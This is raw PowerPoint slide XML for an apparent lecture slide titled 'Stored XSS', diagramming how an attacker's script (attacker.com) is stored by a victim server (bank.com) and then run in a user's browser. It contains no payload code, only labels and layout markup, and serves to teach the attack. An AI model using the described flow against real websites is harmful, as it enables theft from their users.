            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>execute script  embedded in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as though server  meant us to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092825" y="6449822"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541962" y="1539240"/>
            <a:ext cx="2522855" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876546" y="2696972"/>
            <a:ext cx="1506220" cy="506095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="600075">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2130"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618413" y="5400376"/>
            <a:ext cx="728345" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stores  the  script!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Title 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6A8F13-4FD3-F84D-B89B-9AB258675A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D09DB2C-5F11-4D45-8CBE-8A16109FB2D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a: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09600" y="2678536"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="4979988"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4587240"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="3901440"/>
            <a:ext cx="1290955" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="4865417"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3122839" y="4088279"/>
            <a:ext cx="1780337" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-172" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2399357" y="4595477"/>
            <a:ext cx="2600061" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="-2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="-2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="176405" y="365013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8229" y="128133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356784" y="236879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2778214" y="3757967"/>
            <a:ext cx="290497" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
